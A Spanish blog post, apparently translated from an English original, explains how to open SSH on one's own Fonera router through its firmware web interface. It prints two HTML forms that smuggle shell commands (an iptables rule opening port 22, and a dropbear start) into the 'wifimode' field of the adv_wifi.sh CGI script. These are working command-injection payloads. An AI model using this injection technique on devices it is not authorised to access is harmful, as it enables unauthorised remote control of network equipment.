Abriendo el SSH de la Fonera por software (segundo método)
Tras el anterior hack por software (el que usaba un fallo de seguridad a través de la página web de Fon), hoy tenemos un segúndo método para abrir el SSH de la Fonera sin necesidad de cables ni circuitos.
El arículo original (en inglés) es el siguiente: Fonera Hack Part II
Este artículo no es más que una traducción del mismo (más unas cuantas notas divulgativas).
Cabe destacar que el método funciona, por lo menos con la versión actual del firmware ( 7.0 r4) y que si tienes intención de usarlo, cuanto antes lo hagas... mejor, ya que sino los chicos de Fon podrían invalidarlo, enviando los cambios necesarios por la Puerta trasera de la fonera, de tal forma que si fuera el caso, volveríamos a la situación inicial de necesitar un circuito adaptador RS232-TTL y un cable para poder abrir el SSH.
Vamos con el método!
Lo primero que necesitamos son dos ficheros HTML que nos permitirán 'inyectar' el código que queremos ejecutar en la fonera.
Este es el primero:
<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/adv_wifi.sh" enctype="multipart/form-data">
<input name="wifimode" value="/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</body>
</html>
Lo copias, lo pegas en un editor de texto, y lo grabas en tu disco duro con el nombre de step1.html
Ahora, haz lo mismo con éste otro, grabándolo como step2.html :
<html>
<head>
</head>
<body>
<center>
<form method="post" action="http://192.168.10.1/cgi-bin/webif/adv_wifi.sh" enctype="multipart/form-data">
<input name="wifimode" value="/etc/init.d/dropbear" size="68" >
<input type="submit" name="submit" value="Submit" onClick="{this.form.wifimode.value='";' + this.form.wifimode.value +';"'}" />
</form>
</body>
</html>
Bien, el siguiente paso es enchufar la fonera, y, una vez que haya arrancado, conectarte a ella por Wifi, usando la SSID de la red privada (podrias hacerlo tambien a través de cable, poniendo tu PC con una ip de la misma subred que la fonera, por ejemplo... la 169.254.255.2 pero para ello, tendrías que cambiar en los 2 ficheros anteriores (los HTML que te he dicho que hay que grabar) la dirección 192.168.10.1 por la dirección de la fonera en la red local, que es la 169.254.255.1).
Una vez que veas la página web de la fonera, abres el fichero step1.html con tu browser de internet (docle click sobre él y listo) y pulsas el botón 'submit':
y una vez hecho esto, repites la operación con el fichero step2.html :
Una vez hecho todo esto, tu fonera ya tendrá abierto el SSH, aunque sólo de manera momentánea, es decir, que en cuanto la reinicies, lo perderás... así que ahora, lo que tienes que hacer es conectarte mediante SSH y hacer los cambios necesarios para que el SSH quede abierto definitivamente.
Dichos cambios están explicados en cómo abrir el SSH de la fonera
Básicamente se trata de editar el fichero /etc/firewall.user descomentando las 2 líneas que corresponden al puerto 22 del SSH y hacer que el dropbear se inicie en el arranque de la fonera, lo cual se hace creando un enlace simbólico en /etc/init.d mediante las siguientes instrucciones:
root@OpenWrt:/# cd /etc/init.d/ root@OpenWrt:/etc/init.d# ls N10conncheck S20madwifi S50httpd S60cron boot N40thinclient S40network S50qos S60redirect dropbear N50chillispot S45firewall S50telnet S65watchdog rcS root@OpenWrt:/etc/init.d# ln -s dropbear S50dropbear root@OpenWrt:/etc/init.d# ls N10conncheck S40network S50qos S65watchdog N40thinclient S45firewall S50telnet boot N50chillispot S50dropbear S60cron dropbear S20madwifi S50httpd S60redirect rcS root@OpenWrt:/etc/init.d#